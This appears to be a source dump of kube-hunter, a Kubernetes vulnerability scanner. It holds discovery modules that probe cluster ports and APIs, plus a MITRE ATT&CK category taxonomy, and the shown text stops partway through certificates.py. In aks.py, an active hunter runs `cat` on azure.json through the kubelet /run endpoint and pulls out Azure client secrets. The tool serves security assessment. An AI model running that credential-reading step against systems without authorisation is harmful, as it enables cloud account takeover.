229 | location = str(self.host) + ":" + str(self.port)
230 | else:
231 | location = str(self.port)
232 | return location
233 |
234 |
235 | class HuntFinished(Event):
236 | pass
237 |
238 |
239 | class HuntStarted(Event):
240 | pass
241 |
242 |
243 | class ReportDispatched(Event):
244 | pass
245 |
246 |
247 | class K8sVersionDisclosure(Vulnerability, Event):
248 | """The kubernetes version could be obtained from the {} endpoint"""
249 |
250 | def __init__(self, version, from_endpoint, extra_info="", category=None):
251 | Vulnerability.__init__(
252 | self,
253 | KubernetesCluster,
254 | "K8s Version Disclosure",
255 | category=ExposedSensitiveInterfacesTechnique,
256 | vid="KHV002",
257 | )
258 | self.version = version
259 | self.from_endpoint = from_endpoint
260 | self.extra_info = extra_info
261 | self.evidence = version
262 | # depending from where the version came from, we might want to also override the category
263 | if category:
264 | self.category = category
265 |
266 | def explain(self):
267 | return self.__doc__.format(self.from_endpoint) + self.extra_info
268 |
--------------------------------------------------------------------------------
/kube_hunter/core/types/__init__.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | from .hunters import *
3 | from .components import *
4 | from .vulnerabilities import *
5 |
--------------------------------------------------------------------------------
/kube_hunter/core/types/components.py:
--------------------------------------------------------------------------------
1 | class KubernetesCluster:
2 | """Kubernetes Cluster"""
3 |
4 | name = "Kubernetes Cluster"
5 |
6 |
7 | class KubectlClient:
8 | """The kubectl client binary is used by the user to interact with the cluster"""
9 |
10 | name = "Kubectl Client"
11 |
12 |
13 | class Kubelet(KubernetesCluster):
14 | """The kubelet is the primary "node agent" that runs on each node"""
15 |
16 | name = "Kubelet"
17 |
18 |
19 | class AWS(KubernetesCluster):
20 | """AWS Cluster"""
21 |
22 | name = "AWS"
23 |
24 |
25 | class Azure(KubernetesCluster):
26 | """Azure Cluster"""
27 |
28 | name = "Azure"
29 |
--------------------------------------------------------------------------------
/kube_hunter/core/types/hunters.py:
--------------------------------------------------------------------------------
1 | class HunterBase:
2 | publishedVulnerabilities = 0
3 |
4 | @staticmethod
5 | def parse_docs(docs):
6 | """returns tuple of (name, docs)"""
7 | if not docs:
8 | return __name__, ""
9 | docs = docs.strip().split("\n")
10 | for i, line in enumerate(docs):
11 | docs[i] = line.strip()
12 | return docs[0], " ".join(docs[1:]) if len(docs[1:]) else ""
13 |
14 | @classmethod
15 | def get_name(cls):
16 | name, _ = cls.parse_docs(cls.__doc__)
17 | return name
18 |
19 | def publish_event(self, event):
20 | # Import here to avoid circular import from events package.
21 | # imports are cached in python so this should not affect runtime
22 | from ..events.event_handler import handler # noqa
23 |
24 | handler.publish_event(event, caller=self)
25 |
26 |
27 | class ActiveHunter(HunterBase):
28 | pass
29 |
30 |
31 | class Hunter(HunterBase):
32 | pass
33 |
34 |
35 | class Discovery(HunterBase):
36 | pass
37 |
--------------------------------------------------------------------------------
/kube_hunter/core/types/vulnerabilities.py:
--------------------------------------------------------------------------------
1 | """
2 | Vulnerabilities are divided into 2 main categories.
3 |
4 | MITRE Category
5 | --------------
6 | Vulnerability that correlates to a method in the official MITRE ATT&CK matrix for kubernetes
7 |
8 | CVE Category
9 | -------------
10 | "General" category definition. The category is usually determined by the severity of the CVE
11 | """
12 |
13 |
14 | class MITRECategory:
15 | @classmethod
16 | def get_name(cls):
17 | """
18 | Returns the full name of MITRE technique: //
19 | Should only be used on a direct technique class at the end of the MITRE inheritance chain.
20 |
21 | Example inheritance:
22 | MITRECategory -> InitialAccessCategory -> ExposedSensitiveInterfacesTechnique
23 | """
24 | inheritance_chain = cls.__mro__
25 | if len(inheritance_chain) >= 4:
26 | # -3 == index of mitreCategory class. (object class is first)
27 | mitre_category_class = inheritance_chain[-3]
28 | return f"{mitre_category_class.name} // {cls.name}"
29 |
30 |
31 | class CVECategory:
32 | @classmethod
33 | def get_name(cls):
34 | """
35 | Returns the full name of the category: CVE //
36 | """
37 | return f"CVE // {cls.name}"
38 |
39 |
40 | """
41 | MITRE ATT&CK Technique Categories
42 | """
43 |
44 |
45 | class InitialAccessCategory(MITRECategory):
46 | name = "Initial Access"
47 |
48 |
49 | class ExecutionCategory(MITRECategory):
50 | name = "Execution"
51 |
52 |
53 | class PersistenceCategory(MITRECategory):
54 | name = "Persistence"
55 |
56 |
57 | class PrivilegeEscalationCategory(MITRECategory):
58 | name = "Privilege Escalation"
59 |
60 |
61 | class DefenseEvasionCategory(MITRECategory):
62 | name = "Defense Evasion"
63 |
64 |
65 | class CredentialAccessCategory(MITRECategory):
66 | name = "Credential Access"
67 |
68 |
69 | class DiscoveryCategory(MITRECategory):
70 | name = "Discovery"
71 |
72 |
73 | class LateralMovementCategory(MITRECategory):
74 | name = "Lateral Movement"
75 |
76 |
77 | class CollectionCategory(MITRECategory):
78 | name = "Collection"
79 |
80 |
81 | class ImpactCategory(MITRECategory):
82 | name = "Impact"
83 |
84 |
85 | """
86 | MITRE ATT&CK Techniques
87 | """
88 |
89 |
90 | class GeneralSensitiveInformationTechnique(InitialAccessCategory):
91 | name = "General Sensitive Information"
92 |
93 |
94 | class ExposedSensitiveInterfacesTechnique(InitialAccessCategory):
95 | name = "Exposed sensitive interfaces"
96 |
97 |
98 | class MountServicePrincipalTechnique(CredentialAccessCategory):
99 | name = "Mount service principal"
100 |
101 |
102 | class ListK8sSecretsTechnique(CredentialAccessCategory):
103 | name = "List K8S secrets"
104 |
105 |
106 | class AccessContainerServiceAccountTechnique(CredentialAccessCategory):
107 | name = "Access container service account"
108 |
109 |
110 | class AccessK8sApiServerTechnique(DiscoveryCategory):
111 | name = "Access the K8S API Server"
112 |
113 |
114 | class AccessKubeletAPITechnique(DiscoveryCategory):
115 | name = "Access Kubelet API"
116 |
117 |
118 | class AccessK8sDashboardTechnique(DiscoveryCategory):
119 | name = "Access Kubernetes Dashboard"
120 |
121 |
122 | class InstanceMetadataApiTechnique(DiscoveryCategory):
123 | name = "Instance Metadata API"
124 |
125 |
126 | class ExecIntoContainerTechnique(ExecutionCategory):
127 | name = "Exec into container"
128 |
129 |
130 | class SidecarInjectionTechnique(ExecutionCategory):
131 | name = "Sidecar injection"
132 |
133 |
134 | class NewContainerTechnique(ExecutionCategory):
135 | name = "New container"
136 |
137 |
138 | class GeneralPersistenceTechnique(PersistenceCategory):
139 | name = "General Peristence"
140 |
141 |
142 | class HostPathMountPrivilegeEscalationTechnique(PrivilegeEscalationCategory):
143 | name = "hostPath mount"
144 |
145 |
146 | class PrivilegedContainerTechnique(PrivilegeEscalationCategory):
147 | name = "Privileged container"
148 |
149 |
150 | class ClusterAdminBindingTechnique(PrivilegeEscalationCategory):
151 | name = "Cluser-admin binding"
152 |
153 |
154 | class ARPPoisoningTechnique(LateralMovementCategory):
155 | name = "ARP poisoning and IP spoofing"
156 |
157 |
158 | class CoreDNSPoisoningTechnique(LateralMovementCategory):
159 | name = "CoreDNS poisoning"
160 |
161 |
162 | class DataDestructionTechnique(ImpactCategory):
163 | name = "Data Destruction"
164 |
165 |
166 | class GeneralDefenseEvasionTechnique(DefenseEvasionCategory):
167 | name = "General Defense Evasion"
168 |
169 |
170 | class ConnectFromProxyServerTechnique(DefenseEvasionCategory):
171 | name = "Connect from Proxy server"
172 |
173 |
174 | """
175 | CVE Categories
176 | """
177 |
178 |
179 | class CVERemoteCodeExecutionCategory(CVECategory):
180 | name = "Remote Code Execution (CVE)"
181 |
182 |
183 | class CVEPrivilegeEscalationCategory(CVECategory):
184 | name = "Privilege Escalation (CVE)"
185 |
186 |
187 | class CVEDenialOfServiceTechnique(CVECategory):
188 | name = "Denial Of Service (CVE)"
189 |
--------------------------------------------------------------------------------
/kube_hunter/modules/__init__.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | from . import report
3 | from . import discovery
4 | from . import hunting
5 |
--------------------------------------------------------------------------------
/kube_hunter/modules/discovery/__init__.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | from . import (
3 | apiserver,
4 | dashboard,
5 | etcd,
6 | hosts,
7 | kubectl,
8 | kubelet,
9 | ports,
10 | proxy,
11 | )
12 |
--------------------------------------------------------------------------------
/kube_hunter/modules/discovery/apiserver.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import requests
3 |
4 | from kube_hunter.core.types import Discovery
5 | from kube_hunter.core.events.event_handler import handler
6 | from kube_hunter.core.events.types import OpenPortEvent, Service, Event, EventFilterBase
7 |
8 | from kube_hunter.conf import get_config
9 |
10 | KNOWN_API_PORTS = [443, 6443, 8080]
11 |
12 | logger = logging.getLogger(__name__)
13 |
14 |
15 | class K8sApiService(Service, Event):
16 | """A Kubernetes API service"""
17 |
18 | def __init__(self, protocol="https"):
19 | Service.__init__(self, name="Unrecognized K8s API")
20 | self.protocol = protocol
21 |
22 |
23 | class ApiServer(Service, Event):
24 | """The API server is in charge of all operations on the cluster."""
25 |
26 | def __init__(self):
27 | Service.__init__(self, name="API Server")
28 | self.protocol = "https"
29 |
30 |
31 | class MetricsServer(Service, Event):
32 | """The Metrics server is in charge of providing resource usage metrics for pods and nodes to the API server"""
33 |
34 | def __init__(self):
35 | Service.__init__(self, name="Metrics Server")
36 | self.protocol = "https"
37 |
38 |
39 | # Other devices could have this port open, but we can check to see if it looks like a Kubernetes api
40 | # A Kubernetes API service will respond with a JSON message that includes a "code" field for the HTTP status code
41 | @handler.subscribe(OpenPortEvent, predicate=lambda x: x.port in KNOWN_API_PORTS)
42 | class ApiServiceDiscovery(Discovery):
43 | """API Service Discovery
44 | Checks for the existence of K8s API Services
45 | """
46 |
47 | def __init__(self, event):
48 | self.event = event
49 | self.session = requests.Session()
50 | self.session.verify = False
51 |
52 | def execute(self):
53 | logger.debug(f"Attempting to discover an API service on {self.event.host}:{self.event.port}")
54 | protocols = ["http", "https"]
55 | for protocol in protocols:
56 | if self.has_api_behaviour(protocol):
57 | self.publish_event(K8sApiService(protocol))
58 |
59 | def has_api_behaviour(self, protocol):
60 | config = get_config()
61 | try:
62 | r = self.session.get(f"{protocol}://{self.event.host}:{self.event.port}", timeout=config.network_timeout)
63 | if ("k8s" in r.text) or ('"code"' in r.text and r.status_code != 200):
64 | return True
65 | except requests.exceptions.SSLError:
66 | logger.debug(f"{[protocol]} protocol not accepted on {self.event.host}:{self.event.port}")
67 | except Exception:
68 | logger.debug(f"Failed probing {self.event.host}:{self.event.port}", exc_info=True)
69 |
70 |
71 | # Acts as a Filter for services, In the case that we can classify the API,
72 | # We swap the filtered event with a new corresponding Service to next be published
73 | # The classification can be regarding the context of the execution,
74 | # Currently we classify: Metrics Server and Api Server
75 | # If running as a pod:
76 | # We know the Api server IP, so we can classify easily
77 | # If not:
78 | # We determine by accessing the /version on the service.
79 | # Api Server will contain a major version field, while the Metrics will not
80 | @handler.subscribe(K8sApiService)
81 | class ApiServiceClassify(EventFilterBase):
82 | """API Service Classifier
83 | Classifies an API service
84 | """
85 |
86 | def __init__(self, event):
87 | self.event = event
88 | self.classified = False
89 | self.session = requests.Session()
90 | self.session.verify = False
91 | # Using the auth token if we can, for the case that authentication is needed for our checks
92 | if self.event.auth_token:
93 | self.session.headers.update({"Authorization": f"Bearer {self.event.auth_token}"})
94 |
95 | def classify_using_version_endpoint(self):
96 | """Tries to classify by accessing /version. if could not access succeded, returns"""
97 | config = get_config()
98 | try:
99 | endpoint = f"{self.event.protocol}://{self.event.host}:{self.event.port}/version"
100 | versions = self.session.get(endpoint, timeout=config.network_timeout).json()
101 | if "major" in versions:
102 | if versions.get("major") == "":
103 | self.event = MetricsServer()
104 | else:
105 | self.event = ApiServer()
106 | except Exception:
107 | logging.warning("Could not access /version on API service", exc_info=True)
108 |
109 | def execute(self):
110 | discovered_protocol = self.event.protocol
111 | # if running as pod
112 | if self.event.kubeservicehost:
113 | # if the host is the api server's IP, we know it's the Api Server
114 | if self.event.kubeservicehost == str(self.event.host):
115 | self.event = ApiServer()
116 | else:
117 | self.event = MetricsServer()
118 | # if not running as pod.
119 | else:
120 | self.classify_using_version_endpoint()
121 |
122 | # in any case, making sure to link previously discovered protocol
123 | self.event.protocol = discovered_protocol
124 | # If some check classified the Service,
125 | # the event will have been replaced.
126 | return self.event
127 |
--------------------------------------------------------------------------------
/kube_hunter/modules/discovery/dashboard.py:
--------------------------------------------------------------------------------
1 | import json
2 | import logging
3 | import requests
4 |
5 | from kube_hunter.conf import get_config
6 | from kube_hunter.core.events.event_handler import handler
7 | from kube_hunter.core.events.types import Event, OpenPortEvent, Service
8 | from kube_hunter.core.types import Discovery
9 |
10 | logger = logging.getLogger(__name__)
11 |
12 |
13 | class KubeDashboardEvent(Service, Event):
14 | """A web-based Kubernetes user interface allows easy usage with operations on the cluster"""
15 |
16 | def __init__(self, **kargs):
17 | Service.__init__(self, name="Kubernetes Dashboard", **kargs)
18 |
19 |
20 | @handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 30000)
21 | class KubeDashboard(Discovery):
22 | """K8s Dashboard Discovery
23 | Checks for the existence of a Dashboard
24 | """
25 |
26 | def __init__(self, event):
27 | self.event = event
28 |
29 | @property
30 | def secure(self):
31 | config = get_config()
32 | endpoint = f"http://{self.event.host}:{self.event.port}/api/v1/service/default"
33 | logger.debug("Attempting to discover an Api server to access dashboard")
34 | try:
35 | r = requests.get(endpoint, timeout=config.network_timeout)
36 | if "listMeta" in r.text and len(json.loads(r.text)["errors"]) == 0:
37 | return False
38 | except requests.Timeout:
39 | logger.debug(f"failed getting {endpoint}", exc_info=True)
40 | return True
41 |
42 | def execute(self):
43 | if not self.secure:
44 | self.publish_event(KubeDashboardEvent())
45 |
--------------------------------------------------------------------------------
/kube_hunter/modules/discovery/etcd.py:
--------------------------------------------------------------------------------
1 | from kube_hunter.core.events.event_handler import handler
2 | from kube_hunter.core.events.types import Event, OpenPortEvent, Service
3 | from kube_hunter.core.types import Discovery
4 |
5 |
6 | class EtcdAccessEvent(Service, Event):
7 | """Etcd is a DB that stores cluster's data, it contains configuration and current
8 | state information, and might contain secrets"""
9 |
10 | def __init__(self):
11 | Service.__init__(self, name="Etcd")
12 |
13 |
14 | @handler.subscribe(OpenPortEvent, predicate=lambda p: p.port == 2379)
15 | class EtcdRemoteAccess(Discovery):
16 | """Etcd service
17 | check for the existence of etcd service
18 | """
19 |
20 | def __init__(self, event):
21 | self.event = event
22 |
23 | def execute(self):
24 | self.publish_event(EtcdAccessEvent())
25 |
--------------------------------------------------------------------------------
/kube_hunter/modules/discovery/kubectl.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import subprocess
3 |
4 | from kube_hunter.core.types import Discovery
5 | from kube_hunter.core.events.event_handler import handler
6 | from kube_hunter.core.events.types import HuntStarted, Event
7 |
8 | logger = logging.getLogger(__name__)
9 |
10 |
11 | class KubectlClientEvent(Event):
12 | """The API server is in charge of all operations on the cluster."""
13 |
14 | def __init__(self, version):
15 | self.version = version
16 |
17 | def location(self):
18 | return "local machine"
19 |
20 |
21 | # Will be triggered on start of every hunt
22 | @handler.subscribe(HuntStarted)
23 | class KubectlClientDiscovery(Discovery):
24 | """Kubectl Client Discovery
25 | Checks for the existence of a local kubectl client
26 | """
27 |
28 | def __init__(self, event):
29 | self.event = event
30 |
31 | def get_kubectl_binary_version(self):
32 | version = None
33 | try:
34 | # kubectl version --client does not make any connection to the cluster/internet whatsoever.
35 | version_info = subprocess.check_output("kubectl version --client", stderr=subprocess.STDOUT)
36 | if b"GitVersion" in version_info:
37 | # extracting version from kubectl output
38 | version_info = version_info.decode()
39 | start = version_info.find("GitVersion")
40 | version = version_info[start + len("GitVersion':\"") : version_info.find('",', start)]
41 | except Exception:
42 | logger.debug("Could not find kubectl client")
43 | return version
44 |
45 | def execute(self):
46 | logger.debug("Attempting to discover a local kubectl client")
47 | version = self.get_kubectl_binary_version()
48 | if version:
49 | self.publish_event(KubectlClientEvent(version=version))
50 |
--------------------------------------------------------------------------------
/kube_hunter/modules/discovery/kubelet.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import requests
3 | import urllib3
4 | from enum import Enum
5 |
6 | from kube_hunter.conf import get_config
7 | from kube_hunter.core.types import Discovery
8 | from kube_hunter.core.events.event_handler import handler
9 | from kube_hunter.core.events.types import OpenPortEvent, Event, Service
10 |
11 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
12 | logger = logging.getLogger(__name__)
13 |
14 | """ Services """
15 |
16 |
17 | class ReadOnlyKubeletEvent(Service, Event):
18 | """The read-only port on the kubelet serves health probing endpoints,
19 | and is relied upon by many kubernetes components"""
20 |
21 | def __init__(self):
22 | Service.__init__(self, name="Kubelet API (readonly)")
23 |
24 |
25 | class SecureKubeletEvent(Service, Event):
26 | """The Kubelet is the main component in every Node, all pod operations goes through the kubelet"""
27 |
28 | def __init__(self, cert=False, token=False, anonymous_auth=True, **kwargs):
29 | self.cert = cert
30 | self.token = token
31 | self.anonymous_auth = anonymous_auth
32 | Service.__init__(self, name="Kubelet API", **kwargs)
33 |
34 |
35 | class KubeletPorts(Enum):
36 | SECURED = 10250
37 | READ_ONLY = 10255
38 |
39 |
40 | @handler.subscribe(OpenPortEvent, predicate=lambda x: x.port in [10250, 10255])
41 | class KubeletDiscovery(Discovery):
42 | """Kubelet Discovery
43 | Checks for the existence of a Kubelet service, and its open ports
44 | """
45 |
46 | def __init__(self, event):
47 | self.event = event
48 |
49 | def get_read_only_access(self):
50 | config = get_config()
51 | endpoint = f"http://{self.event.host}:{self.event.port}/pods"
52 | logger.debug(f"Trying to get kubelet read access at {endpoint}")
53 | r = requests.get(endpoint, timeout=config.network_timeout)
54 | if r.status_code == 200:
55 | self.publish_event(ReadOnlyKubeletEvent())
56 |
57 | def get_secure_access(self):
58 | logger.debug("Attempting to get kubelet secure access")
59 | ping_status = self.ping_kubelet()
60 | if ping_status == 200:
61 | self.publish_event(SecureKubeletEvent(secure=False))
62 | elif ping_status == 403:
63 | self.publish_event(SecureKubeletEvent(secure=True))
64 | elif ping_status == 401:
65 | self.publish_event(SecureKubeletEvent(secure=True, anonymous_auth=False))
66 |
67 | def ping_kubelet(self):
68 | config = get_config()
69 | endpoint = f"https://{self.event.host}:{self.event.port}/pods"
70 | logger.debug("Attempting to get pods info from kubelet")
71 | try:
72 | return requests.get(endpoint, verify=False, timeout=config.network_timeout).status_code
73 | except Exception:
74 | logger.debug(f"Failed pinging https port on {endpoint}", exc_info=True)
75 |
76 | def execute(self):
77 | if self.event.port == KubeletPorts.SECURED.value:
78 | self.get_secure_access()
79 | elif self.event.port == KubeletPorts.READ_ONLY.value:
80 | self.get_read_only_access()
81 |
--------------------------------------------------------------------------------
/kube_hunter/modules/discovery/kubernetes_client.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import kubernetes
3 |
4 |
5 | def list_all_k8s_cluster_nodes(kube_config=None, client=None):
6 | logger = logging.getLogger(__name__)
7 | try:
8 | if kube_config:
9 | logger.debug("Attempting to use kubeconfig file: %s", kube_config)
10 | kubernetes.config.load_kube_config(config_file=kube_config)
11 | else:
12 | logger.debug("Attempting to use in cluster Kubernetes config")
13 | kubernetes.config.load_incluster_config()
14 | except kubernetes.config.config_exception.ConfigException as ex:
15 | logger.debug(f"Failed to initiate Kubernetes client: {ex}")
16 | return
17 |
18 | try:
19 | if client is None:
20 | client = kubernetes.client.CoreV1Api()
21 | ret = client.list_node(watch=False)
22 | logger.info("Listed %d nodes in the cluster" % len(ret.items))
23 | for item in ret.items:
24 | for addr in item.status.addresses:
25 | yield addr.address
26 | except Exception as ex:
27 | logger.debug(f"Failed to list nodes from Kubernetes: {ex}")
28 |
--------------------------------------------------------------------------------
/kube_hunter/modules/discovery/ports.py:
--------------------------------------------------------------------------------
1 | import logging
2 | from socket import socket
3 |
4 | from kube_hunter.core.types import Discovery
5 | from kube_hunter.core.events.event_handler import handler
6 | from kube_hunter.core.events.types import NewHostEvent, OpenPortEvent
7 |
8 | logger = logging.getLogger(__name__)
9 | default_ports = [8001, 8080, 10250, 10255, 30000, 443, 6443, 2379]
10 |
11 |
12 | @handler.subscribe(NewHostEvent)
13 | class PortDiscovery(Discovery):
14 | """Port Scanning
15 | Scans Kubernetes known ports to determine open endpoints for discovery
16 | """
17 |
18 | def __init__(self, event):
19 | self.event = event
20 | self.host = event.host
21 | self.port = event.port
22 |
23 | def execute(self):
24 | logger.debug(f"host {self.host} try ports: {default_ports}")
25 | for single_port in default_ports:
26 | if self.test_connection(self.host, single_port):
27 | logger.debug(f"Reachable port found: {single_port}")
28 | self.publish_event(OpenPortEvent(port=single_port))
29 |
30 | @staticmethod
31 | def test_connection(host, port):
32 | s = socket()
33 | s.settimeout(1.5)
34 | try:
35 | logger.debug(f"Scanning {host}:{port}")
36 | success = s.connect_ex((str(host), port))
37 | if success == 0:
38 | return True
39 | except Exception:
40 | logger.debug(f"Failed to probe {host}:{port}")
41 | finally:
42 | s.close()
43 | return False
44 |
--------------------------------------------------------------------------------
/kube_hunter/modules/discovery/proxy.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import requests
3 |
4 | from kube_hunter.conf import get_config
5 | from kube_hunter.core.types import Discovery
6 | from kube_hunter.core.events.event_handler import handler
7 | from kube_hunter.core.events.types import Service, Event, OpenPortEvent
8 |
9 | logger = logging.getLogger(__name__)
10 |
11 |
12 | class KubeProxyEvent(Event, Service):
13 | """proxies from a localhost address to the Kubernetes apiserver"""
14 |
15 | def __init__(self):
16 | Service.__init__(self, name="Kubernetes Proxy")
17 |
18 |
19 | @handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 8001)
20 | class KubeProxy(Discovery):
21 | """Proxy Discovery
22 | Checks for the existence of a an open Proxy service
23 | """
24 |
25 | def __init__(self, event):
26 | self.event = event
27 | self.host = event.host
28 | self.port = event.port or 8001
29 |
30 | @property
31 | def accesible(self):
32 | config = get_config()
33 | endpoint = f"http://{self.host}:{self.port}/api/v1"
34 | logger.debug("Attempting to discover a proxy service")
35 | try:
36 | r = requests.get(endpoint, timeout=config.network_timeout)
37 | if r.status_code == 200 and "APIResourceList" in r.text:
38 | return True
39 | except requests.Timeout:
40 | logger.debug(f"failed to get {endpoint}", exc_info=True)
41 | return False
42 |
43 | def execute(self):
44 | if self.accesible:
45 | self.publish_event(KubeProxyEvent())
46 |
--------------------------------------------------------------------------------
/kube_hunter/modules/hunting/__init__.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | from . import (
3 | aks,
4 | apiserver,
5 | capabilities,
6 | certificates,
7 | cves,
8 | dashboard,
9 | etcd,
10 | kubelet,
11 | mounts,
12 | proxy,
13 | secrets,
14 | )
15 |
--------------------------------------------------------------------------------
/kube_hunter/modules/hunting/aks.py:
--------------------------------------------------------------------------------
1 | import os
2 | import json
3 | import logging
4 | import requests
5 |
6 | from kube_hunter.conf import get_config
7 | from kube_hunter.modules.hunting.kubelet import ExposedPodsHandler, SecureKubeletPortHunter
8 | from kube_hunter.core.events.event_handler import handler
9 | from kube_hunter.core.events.types import Event, Vulnerability
10 | from kube_hunter.core.types import Hunter, ActiveHunter, MountServicePrincipalTechnique, Azure
11 |
12 | logger = logging.getLogger(__name__)
13 |
14 |
15 | class AzureSpnExposure(Vulnerability, Event):
16 | """The SPN is exposed, potentially allowing an attacker to gain access to the Azure subscription"""
17 |
18 | def __init__(self, container, evidence=""):
19 | Vulnerability.__init__(
20 | self,
21 | Azure,
22 | "Azure SPN Exposure",
23 | category=MountServicePrincipalTechnique,
24 | vid="KHV004",
25 | )
26 | self.container = container
27 | self.evidence = evidence
28 |
29 |
30 | @handler.subscribe(ExposedPodsHandler, predicate=lambda x: x.cloud_type == "Azure")
31 | class AzureSpnHunter(Hunter):
32 | """AKS Hunting
33 | Hunting Azure cluster deployments using specific known configurations
34 | """
35 |
36 | def __init__(self, event):
37 | self.event = event
38 | self.base_url = f"https://{self.event.host}:{self.event.port}"
39 |
40 | # getting a container that has access to the azure.json file
41 | def get_key_container(self):
42 | logger.debug("Trying to find container with access to azure.json file")
43 |
44 | # pods are saved in the previous event object
45 | pods_data = self.event.pods
46 |
47 | suspicious_volume_names = []
48 | for pod_data in pods_data:
49 | for volume in pod_data["spec"].get("volumes", []):
50 | if volume.get("hostPath"):
51 | path = volume["hostPath"]["path"]
52 | if "/etc/kubernetes/azure.json".startswith(path):
53 | suspicious_volume_names.append(volume["name"])
54 | for container in pod_data["spec"]["containers"]:
55 | for mount in container.get("volumeMounts", []):
56 | if mount["name"] in suspicious_volume_names:
57 | return {
58 | "name": container["name"],
59 | "pod": pod_data["metadata"]["name"],
60 | "namespace": pod_data["metadata"]["namespace"],
61 | "mount": mount,
62 | }
63 |
64 | def execute(self):
65 | container = self.get_key_container()
66 | if container:
67 | evidence = f"pod: {container['pod']}, namespace: {container['namespace']}"
68 | self.publish_event(AzureSpnExposure(container=container, evidence=evidence))
69 |
70 |
71 | @handler.subscribe(AzureSpnExposure)
72 | class ProveAzureSpnExposure(ActiveHunter):
73 | """Azure SPN Hunter
74 | Gets the azure subscription file on the host by executing inside a container
75 | """
76 |
77 | def __init__(self, event):
78 | self.event = event
79 | self.base_url = f"https://{self.event.host}:{self.event.port}"
80 |
81 | def test_run_capability(self):
82 | """
83 | Uses SecureKubeletPortHunter to test the /run handler
84 | TODO: when multiple event subscription is implemented, use this here to make sure /run is accessible
85 | """
86 | debug_handlers = SecureKubeletPortHunter.DebugHandlers(path=self.base_url, session=self.event.session, pod=None)
87 | return debug_handlers.test_run_container()
88 |
89 | def run(self, command, container):
90 | config = get_config()
91 | run_url = f"{self.base_url}/run/{container['namespace']}/{container['pod']}/{container['name']}"
92 | return self.event.session.post(run_url, verify=False, params={"cmd": command}, timeout=config.network_timeout)
93 |
94 | def get_full_path_to_azure_file(self):
95 | """
96 | Returns a full path to /etc/kubernetes/azure.json
97 | Taking into consideration the difference folder of the mount inside the container.
98 | TODO: implement the edge case where the mount is to parent /etc folder.
99 | """
100 | azure_file_path = self.event.container["mount"]["mountPath"]
101 |
102 | # taking care of cases where a subPath is added to map the specific file
103 | if not azure_file_path.endswith("azure.json"):
104 | azure_file_path = os.path.join(azure_file_path, "azure.json")
105 |
106 | return azure_file_path
107 |
108 | def execute(self):
109 | if not self.test_run_capability():
110 | logger.debug("Not proving AzureSpnExposure because /run debug handler is disabled")
111 | return
112 |
113 | try:
114 | azure_file_path = self.get_full_path_to_azure_file()
115 | logger.debug(f"trying to access the azure.json at the resolved path: {azure_file_path}")
116 | subscription = self.run(f"cat {azure_file_path}", container=self.event.container).json()
117 | except requests.Timeout:
118 | logger.debug("failed to run command in container", exc_info=True)
119 | except json.decoder.JSONDecodeError:
120 | logger.warning("failed to parse SPN")
121 | else:
122 | if "subscriptionId" in subscription:
123 | self.event.subscriptionId = subscription["subscriptionId"]
124 | self.event.aadClientId = subscription["aadClientId"]
125 | self.event.aadClientSecret = subscription["aadClientSecret"]
126 | self.event.tenantId = subscription["tenantId"]
127 | self.event.evidence = f"subscription: {self.event.subscriptionId}"
128 |
--------------------------------------------------------------------------------
/kube_hunter/modules/hunting/capabilities.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import logging
3 |
4 | from kube_hunter.modules.discovery.hosts import RunningAsPodEvent
5 | from kube_hunter.core.events.event_handler import handler
6 | from kube_hunter.core.events.types import Event, Vulnerability
7 | from kube_hunter.core.types import Hunter, ARPPoisoningTechnique, KubernetesCluster
8 |
9 | logger = logging.getLogger(__name__)
10 |
11 |
12 | class CapNetRawEnabled(Event, Vulnerability):
13 | """CAP_NET_RAW is enabled by default for pods.
14 | If an attacker manages to compromise a pod,
15 | they could potentially take advantage of this capability to perform network
16 | attacks on other pods running on the same node"""
17 |
18 | def __init__(self):
19 | Vulnerability.__init__(
20 | self,
21 | KubernetesCluster,
22 | name="CAP_NET_RAW Enabled",
23 | category=ARPPoisoningTechnique,
24 | )
25 |
26 |
27 | @handler.subscribe(RunningAsPodEvent)
28 | class PodCapabilitiesHunter(Hunter):
29 | """Pod Capabilities Hunter
30 | Checks for default enabled capabilities in a pod
31 | """
32 |
33 | def __init__(self, event):
34 | self.event = event
35 |
36 | def check_net_raw(self):
37 | logger.debug("Passive hunter's trying to open a RAW socket")
38 | try:
39 | # trying to open a raw socket without CAP_NET_RAW will raise PermissionsError
40 | s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
41 | s.close()
42 | logger.debug("Passive hunter's closing RAW socket")
43 | return True
44 | except PermissionError:
45 | logger.debug("CAP_NET_RAW not enabled")
46 |
47 | def execute(self):
48 | if self.check_net_raw():
49 | self.publish_event(CapNetRawEnabled())
50 |
--------------------------------------------------------------------------------
/kube_hunter/modules/hunting/certificates.py:
--------------------------------------------------------------------------------
1 | import ssl
2 | import logging
3 | import base64
4 | import re
5 |
6 | from kube_hunter.core.types import Hunter, KubernetesCluster, GeneralSensitiveInformationTechnique
7 | from kube_hunter.core.events.event_handler import handler
8 | from kube_hunter.core.events.types import Vulnerability, Event, Service
9 |
10 | logger = logging.getLogger(__name__)
11 | email_pattern = re.compile(rb"([a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+)")
12 |
13 |
14 | class CertificateEmail(Vulnerability, Event):
15 | """The Kubernetes API Server advertises a public certificate for TLS.
16 | This certificate includes an email address, that may provide additional information for an attacker on your
17 | organization, or be abused for further email based attacks."""
18 |
19 | def __init__(self, email):
20 | Vulnerability.__init__(
21 | self,
22 | KubernetesCluster,
23 | "Certificate Includes Email Address",
24 | category=GeneralSensitiveInformationTechnique,
25 | vid="KHV021",
26 | )
27 | self.email = email
28 | self.evidence = f"email: {self.email}"
29 |
30 |
31 | @handler.subscribe(Service)
32 | class CertificateDiscovery(Hunter):
33 | """Certificate Email Hunting
34 | Checks for email addresses in kubernetes ssl certificates
35 | """
36 |
37 | def __init__(self, event):
38 | self.event = event
39 |
